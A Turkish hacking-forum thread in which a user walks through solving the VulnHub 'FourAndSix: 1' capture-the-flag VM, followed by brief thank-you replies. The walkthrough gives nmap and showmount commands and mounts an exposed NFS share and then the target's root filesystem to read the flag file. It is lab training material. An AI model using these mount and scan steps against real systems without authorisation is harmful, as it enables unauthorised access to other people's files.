İPUCU

Capture The Flag Vulnerable VM Walkthrough & Capture The Flag Writeup Yazabileceğiniz Bölüm

Seçenekler

FourAndSix: 1 Zafiyetli Makine Çözümü [qwx]

01-12-2018 23:23
#1
Qwx - ait Kullanıcı Resmi (Avatar)
Qwx
Siber Güvenlik Ekibi
Üyelik tarihi:
04/2012
Nereden:
İzmir
Mesajlar:
2.520
Teşekkür (Etti):
77
Teşekkür (Aldı):
465
Konular:
52
Ticaret:
(0) %
FourAndSix: 1 Zaafiyetli Makine Çözümü


FourAndSix:1 İndirme Linki;


Kod:
https://www.vulnhub.com/entry/fourandsix-1,236/



Makinemizi açıyoruz bu şekilde bir görüntü geliyor karşımıza.







Makinemizi açtık ve her zamanki gibi IP taraması yapıyoruz.
Kod:
netdiscover





IP adresimizi bulduk ve siteye girmeyi deniyoruz.Fakat siteye bağlantı sağlanmıyor.




Hemen vakit kaybetmeden açık port taraması yapıyoruz.Tarattığımız portlarda 2049 portu açık ve NFS yani ağ dosya sistemi buradan dosyalara erişebileceğimiz anlamına gelmektedir.
Kod:
nmap -sS -sV <adress>





Aşağıda yaptığımız işlemler sırası ile ; Paylaşılan klasorün herkese açık olduğunu görüyoruz ve içindekileri görmek için /tmp dizinine bir klasor açıyoruz.Klasoru oluşturduktan sonra bilgilere erişmek için mount komutunu kullanıyoruz.En son olarakda içindeki çıkan bilgileri ekrana yazdırıyoruz.

Kod:
showmount -e <adress>
cd /tmp
 mkdir <klasoradi>
 mount -t nfs <adress>:/shared /tmp/<klasoradi>
 cd <klasoradi>
 mkdir <klasoradi>
 mount USB-stick.img <klasoradi>
 cd <klasoradi>
 ls -la





Listeleme yaptıktan sonra bizi 8 tane hello.jpeg/png karışımı dosyalar bizi beklemekte merak edip ilgili dizine gidip görüntüleme yapıyoruz.
Böyle bir şey beklemediğim kesin idi
Kök dizinin paylaşıma açık olup olmadığını kontrol edelim.Eğer açık ise oradan birşeyler elde etme şansımız bu duruma bakılırsa çok yüksek.



Kod:
mkdir root
mount <adress>:/ root
 cd root
 ls -la
 cd root
 ls -la





Görüğümüz üzere proof.txt çıktı karşımıza büyük bir olasılık dahilinde flag karşımıza çıkacaktır.
Kod:
cat proof.txt



Ve flag ... Kısa basit hoş daha çok NFS kullanıma yönelik bir CTF olmuş.

Kullanıcı İmzası
A hacker does for love what others would not do for money.
Konu Qwx tarafından (02-12-2018 11:36 Saat 11:36 ) değiştirilmiştir.
PashaReyiz, BH80 Teşekkür etti.

05-01-2019 00:08
#2
X - ait Kullanıcı Resmi (Avatar)
X
Administrator
Üyelik tarihi:
04/2013
Mesajlar:
38.730
Teşekkür (Etti):
0
Teşekkür (Aldı):
3744
Konular:
445
Ticaret:
(0) %
Eline sağlık
05-01-2019 00:17
#3
Qwx - ait Kullanıcı Resmi (Avatar)
Qwx
Siber Güvenlik Ekibi
Üyelik tarihi:
04/2012
Nereden:
İzmir
Mesajlar:
2.520
Teşekkür (Etti):
77
Teşekkür (Aldı):
465
Konular:
52
Ticaret:
(0) %
Alıntı:
'TURKSTFN´isimli üyeden Alıntı Mesajı göster
Eline sağlık
Teşekkür ediyorum komutanım.
Kullanıcı İmzası
A hacker does for love what others would not do for money.
05-01-2019 00:23
#4
Castiel - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2019
Mesajlar:
45
Teşekkür (Etti):
16
Teşekkür (Aldı):
6
Konular:
5
Ticaret:
(0) %
Elinize saglik, aciklamali ve guzel olmus.
05-01-2019 00:51
#5
TheSayokan - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2016
Mesajlar:
730
Teşekkür (Etti):
27
Teşekkür (Aldı):
90
Konular:
105
Ticaret:
(0) %
eline sağlık
Kullanıcı İmzası
Tanrı Türk'ü Korusun !
06-01-2019 00:39
#6
ch_arli41 - ait Kullanıcı Resmi (Avatar)
Eğitmen
Üyelik tarihi:
07/2009
Mesajlar:
953
Teşekkür (Etti):
562
Teşekkür (Aldı):
440
Konular:
57
Ticaret:
(0) %
Eline sağlık güzel konu olmuş
Kullanıcı İmzası
06-01-2019 00:51
#7
0uTCasT - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
12/2018
Nereden:
Networks
Mesajlar:
707
Teşekkür (Etti):
66
Teşekkür (Aldı):
115
Konular:
18
Ticaret:
(0) %
Eline sağlık başarılı güzel bir içerik olmuş.
Kullanıcı İmzası
Beyin Bir Donanımdır Herkeste Vardır,
Akıl İse Bir Yazılımdır Herkeste Yoktur.
06-01-2019 01:09
#8
Qwx - ait Kullanıcı Resmi (Avatar)
Qwx
Siber Güvenlik Ekibi
Üyelik tarihi:
04/2012
Nereden:
İzmir
Mesajlar:
2.520
Teşekkür (Etti):
77
Teşekkür (Aldı):
465
Konular:
52
Ticaret:
(0) %
Alıntı:
Castiel´isimli üyeden Alıntı Mesajı göster
Elinize saglik, aciklamali ve guzel olmus.
Teşekkür ederim.

Alıntı:
TheSayokan´isimli üyeden Alıntı Mesajı göster
eline sağlık
Teşekkür ederim.

Alıntı:
ch_arli41´isimli üyeden Alıntı Mesajı göster
Eline sağlık güzel konu olmuş
Teşekkür ederim komutanım.

Alıntı:
0uTCasT´isimli üyeden Alıntı Mesajı göster
Eline sağlık başarılı güzel bir içerik olmuş.
Teşekkür ederim.
Kullanıcı İmzası
A hacker does for love what others would not do for money.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı